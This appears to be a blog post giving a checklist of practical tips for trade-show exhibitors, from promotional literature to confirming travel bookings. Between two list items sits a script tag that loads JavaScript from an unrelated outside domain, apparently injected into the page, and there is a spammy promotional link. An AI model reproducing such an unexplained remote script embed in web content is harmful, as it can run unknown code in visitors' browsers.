<p>Owning a company that caters to events and promotions, I have seen the worst of the worst case scenarios that can occur. Expect that things WILL go wrong as they will. I have prepared a check list that might help anyone with a future promotion or exhibit:</p>
<p>    * Make sure you have or prepare any type of simple promotional literature that is clear to the point and highlights your service or product. Too much detail is unnecessary as the contact number and photo of the product or service is quite enough. Small promotional items are very helpful as well &#8211; bottom line, make a cool impression and increase your odds of making a sale or contact.</p>
<p>    * Did you remember to bring an assortment of office supplies such as pens, paper, tape, paper clips, markers, stapler, scissors, screwdrivers, extension cords, etc. All of these will serve a purpose in some way or another as sometimes a booth breaks, banners fall down, lights burn out, cords do not work. Also remember to bring extra computers or laptops if your presentation depends on it.</p>
<p>    * Always remember to clearly make all your belongings &#8211; put your business card and contact information inside, as well as outside, all shipped boxes and suitcases in case they are lost. You would be surprised at how many times we misplaced an important box only to have someone call us!</p><div style="float:right;margin-left:1.0em;padding:0;"><SCRIPT type="text/javascript" LANGUAGE="javascript" src="http://www.qksz.net/1e-hz44"> </SCRIPT></div>
<p>    * Make sure that you have all the contact numbers of people such as security for the event, event managers, facility manager. Also have your registration packet with you and a list of phone numbers of all key contacts at the event.</p>
<p>    * Make sure you give a copy of your travel itinerary with your family and co-workers so that they know where you are in the event of an emergency.</p>
<p>    * One of the best things you can do is to increase your exposure and attract traffic with new interactive displays and systems that encourage participation which always creates fun and a lot of laughter with in turn gathers more people. <a href='http://www.videosurfboard.com' target='_blank'>Trade show promotion traffic secrets!</a></p>
<p>    * It is so important that you make at least two calls to the exhibit sponsor two weeks before the event. It is always wise to confirm the details of you booth space, etc. closing times, opening times, breakdown dates, etc. as they sometimes change just before the event. Ask them where and when you will be able to deliver and then find and pick up your shipment. In addition, get the name of a local printing and shipping store as you might need this in the event you have to make new brochures or changes to your information in a jiffy. Take at least 25% more literature and giveaways than you think you will use. <p>    * Make double and triple calls to confirm all of your travel and transportation arrangements. Too many times we have had a person tell us one thing and then another agent tell us another piece of new information. You would be surprised at how many times we landed and discovered there were no reservations in our company name for hotels and cars &#8211; we did not triple check. Remember that the weakest links are phone agents and employees who might be gone (fired or left) by the time you travel.</p>
